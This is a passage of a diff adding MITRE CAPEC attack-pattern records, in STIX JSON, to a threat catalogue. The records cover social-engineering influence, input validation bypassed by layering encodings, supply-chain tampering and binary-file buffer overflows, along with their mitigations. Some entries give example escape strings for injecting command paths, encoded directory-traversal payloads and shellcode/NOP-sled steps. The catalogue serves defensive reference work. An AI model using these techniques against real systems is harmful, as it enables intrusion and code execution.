affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6297aac6-1e4d-4c28-9268-52f70584ec5b", + "attack-pattern--bbd4f017-9a98-495c-889f-68d85aca375a", + "attack-pattern--6d30ec21-b3b4-435d-9045-acd660865e6a", + "attack-pattern--c207660b-d5b1-4928-b472-251f19a094d0", + "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c110197f-03b6-4bd2-8fc6-22c90a73c5e9", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary tailors their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the adversary has adapted their communication forms to match those of the target. When skillfully employed, the target is likely to be unaware that they are being manipulated.", + "external_references": [ + { + "external_id": "CAPEC-428", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/428.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--6297aac6-1e4d-4c28-9268-52f70584ec5b", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Influence via Modes of Thinking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary gains information via non-verbal means from the target through eye movements.", + "external_references": [ + { + "external_id": "CAPEC-429", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/429.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--bbd4f017-9a98-495c-889f-68d85aca375a", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Target Influence via Eye Cues", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a \"layer\" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: --> --> . In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.", + "external_references": [ + { + "external_id": "CAPEC-43", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/43.html" + }, + { + "external_id": "CWE-179", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploiting Multiple Input Interpretation Layers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to \"double escape\" the backslash. In some cases, a quadruple escape is necessary.\n Original String: C:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\cmd.exe /c\n \n Interim String: C:\\\\winnt\\\\system32\\\\cmd.exe /c\n \n Final String: C:\\winnt\\system32\\cmd.exe /c\n This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.\n [REF-1]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application/system inputs where bypassing input validation is desired: The attacker first needs to determine all of the application's/system's inputs where input validation is being performed and where they want to bypass it.

    2. Techniques
    While using an application/system, the attacker discovers an input where validation is stopping them from performing some malicious or unauthorized actions.

Experiment

  1. Determine which character encodings are accepted by the application/system: The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application's/system's response to the encoded data to determine whether the data was interpreted properly.

    2. Techniques
    Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, '\\'
    Determine whether URL encoding is accepted by the application/system.
    Determine whether UTF-8 encoding is accepted by the application/system.
    Determine whether UTF-16 encoding is accepted by the application/system.
    Determine if any other encodings are accepted by the application/system.

  2. Combine multiple encodings accepted by the application.: The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times.

    3. Techniques
    Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: \"\\\\\\.\". With two parsing layers, this may get converted to \"\\.\" after the first parsing layer, and then, to \".\" after the second. If the input validation layer is between the two parsing layers, then \"\\\\\\.\\\\\\.\" might pass a test for \"..\" but still get converted to \"..\" afterwards. This may enable directory traversal attacks.
    Combine multiple encodings and observe the effects. For example, the attacker might encode \".\" as \"\\.\", and then, encode \"\\.\" as \"\.\", and then, encode that using URL encoding to \"%26%2392%3B%26%2346%3B\"

Exploit

  1. Leverage ability to bypass input validation: Attacker leverages their ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here.

    2. Techniques
    Gain access to sensitive files.
    Perform command injection.
    Perform SQL injection.
    Perform XSS attacks.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "User input is used to construct a command to be executed on the target system or as part of the file name.", + "Multiple parser passes are performed on the data supplied by the user." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of various escaping schemes, such as URL escape encoding and XML escape characters." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.", + "id": "course-of-action--809958b7-bafc-4845-87c4-cab53e86cb67", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1cce6424-2120-47d0-979c-8ee21cfa1e1a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--809958b7-bafc-4845-87c4-cab53e86cb67", + "spec_version": "2.1", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.", + "id": "course-of-action--d94176ef-a1ff-499b-86b7-e94e8734ab6a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2e5ce6d-7c06-4bf7-9b38-475351b97ad1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d94176ef-a1ff-499b-86b7-e94e8734ab6a", + "spec_version": "2.1", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist would not be permitted to enter into the system.", + "id": "course-of-action--f0f8d5a1-d4cc-4eac-b405-4af5e4a821c6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--45fc127a-991a-47f3-a564-b96d95896f3c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0f8d5a1-d4cc-4eac-b405-4af5e4a821c6", + "spec_version": "2.1", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-430", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/430.html" + } + ], + "id": "attack-pattern--8428f01f-d4ca-4fb0-866d-8d5716b36265", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Micro-Expressions", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-431", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/431.html" + } + ], + "id": "attack-pattern--76afdae0-2970-44dc-8ae0-fd04629b0dab", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Neuro-Linguistic Programming (NLP)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-432", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html" + } + ], + "id": "attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message.", + "external_references": [ + { + "external_id": "CAPEC-433", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/433.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--6d30ec21-b3b4-435d-9045-acd660865e6a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Target Influence via The Human Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_extended_description": "\n The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human \"buffer overflow\" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.\n ", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-434", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/434.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--c207660b-d5b1-4928-b472-251f19a094d0", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Interview and Interrogation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-435", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/435.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Instant Rapport", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "external_id": "CAPEC-438", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, Inc.", + "external_id": "REF-380", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Modification During Manufacture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.", + "external_references": [ + { + "external_id": "CAPEC-439", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/439.html" + }, + { + "external_id": "CWE-1269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1269.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "SAFECode, The Software Supply Chain Integrity Framework Defining Risks and Responsibilities for Securing Software in the Global Supply Chain, 2009, Safecode.org", + "external_id": "REF-384", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Manipulation During Distribution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.", + "External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. This can allow the adversary access to the execution stack and execute arbitrary code in the target process.", + "external_references": [ + { + "external_id": "CAPEC-44", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/44.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Overflow Binary Resource File", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the adversary has an excellent vector for wide distribution. There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target software: The adversary identifies software that uses external binary files in some way. This could be a file upload, downloading a file from a shared location, or other means.

Experiment

  1. Find injection vector: The adversary creates a malicious binary file by altering the header to make the file seem shorter than it is. Additional bytes are added to the end of the file to be placed in the overflowed location. The adversary then deploys the file to the software to determine if a buffer overflow was successful.

  2. Craft overflow content: Once the adversary has determined that this attack is viable, they will specially craft the binary file in a way that achieves the desired behavior. If the source code is available, the adversary can carefully craft the malicious file so that the return address is overwritten to an intended value. If the source code is not available, the adversary will iteratively alter the file in order to overwrite the return address correctly.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Once the adversary has constructed a file that will effectively overflow the targeted software in the intended way. The file is deployed to the software, either by serving it directly to the software or placing it in a shared location for a victim to load into the software.

", + "x_capec_extended_description": "This attack pattern is a variant of standard buffer overflow attack using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The adversary is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application for the victim to download. The adversary then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software processes binary resource files.", + "Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file." + ], + "x_capec_skills_required": { + "Medium": "To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform appropriate bounds checking on all buffers.", + "id": "course-of-action--67074d87-d035-4907-8971-d22cf929a6a6", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--158ab2a0-3900-4c6d-a6b8-f70b277abce5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67074d87-d035-4907-8971-d22cf929a6a6", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbdf6185-93ce-4ed8-b163-4441304d2cec", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 